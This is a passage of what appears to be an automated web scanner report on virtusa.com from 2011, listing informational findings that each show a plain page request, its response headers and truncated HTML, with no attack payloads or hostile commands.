X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.618. http://www.virtusa.com/ftbu/services/technology/system-migration.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/system-migration.asp

Request

GET /ftbu/services/technology/system-migration.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20192
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:50:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:50:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.619. http://www.virtusa.com/ftbu/services/technology/upgrades.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/upgrades.asp

Request

GET /ftbu/services/technology/upgrades.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20218
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:50:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:50:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.620. http://www.virtusa.com/ftbu/sitemap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/sitemap.asp

Request

GET /ftbu/sitemap.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24730
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.621. http://www.virtusa.com/ftbu/terms-conditions.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/terms-conditions.asp

Request

GET /ftbu/terms-conditions.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27913
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.622. http://www.virtusa.com/industries/banking-financial-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/banking-financial-services/

Request

GET /industries/banking-financial-services/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25236
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:43:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:43:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.623. http://www.virtusa.com/industries/communications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/communications/

Request

GET /industries/communications/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23743
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.624. http://www.virtusa.com/industries/high-technology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/high-technology/

Request

GET /industries/high-technology/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20276
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.625. http://www.virtusa.com/industries/independent-software-vendors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/independent-software-vendors/

Request

GET /industries/independent-software-vendors/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22750
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.626. http://www.virtusa.com/industries/insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/insurance/

Request

GET /industries/insurance/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22806
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.627. http://www.virtusa.com/industries/media-information-entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/media-information-entertainment/

Request

GET /industries/media-information-entertainment/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25542
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.628. http://www.virtusa.com/industries/pharmaceuticals/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /industries/pharmaceuticals/

Request

GET /industries/pharmaceuticals/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22119
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:44:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:44:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.629. http://www.virtusa.com/investors/SEC_filings.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/SEC_filings.asp

Request

GET /investors/SEC_filings.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17306
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.630. http://www.virtusa.com/investors/annual_report_and_proxy_statement.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/annual_report_and_proxy_statement.asp

Request

GET /investors/annual_report_and_proxy_statement.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23943
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.631. http://www.virtusa.com/investors/corporate_governance.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/corporate_governance.asp

Request

GET /investors/corporate_governance.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22092
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.632. http://www.virtusa.com/investors/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/default.asp

Request

GET /investors/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31170
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.633. http://www.virtusa.com/investors/investor_contact.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/investor_contact.asp

Request

GET /investors/investor_contact.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20806
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.634. http://www.virtusa.com/investors/stock_information.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /investors/stock_information.asp

Request

GET /investors/stock_information.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17042
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.635. http://www.virtusa.com/newsroom/article.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /newsroom/article.asp

Request

GET /newsroom/article.asp?id=154&page=1&year=&showq=1 HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25316
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:39:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.636. http://www.virtusa.com/newsroom/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /newsroom/default.asp

Request

GET /newsroom/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19013
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:39:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.637. http://www.virtusa.com/newsroom/events.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /newsroom/events.asp

Request

GET /newsroom/events.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20188
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:39:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.638. http://www.virtusa.com/newsroom/in-the-media.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /newsroom/in-the-media.asp

Request

GET /newsroom/in-the-media.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24234
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.639. http://www.virtusa.com/newsroom/press-releases.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /newsroom/press-releases.asp

Request

GET /newsroom/press-releases.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21581
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:39:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.640. http://www.virtusa.com/platforming/overview.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /platforming/overview.asp

Request

GET /platforming/overview.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
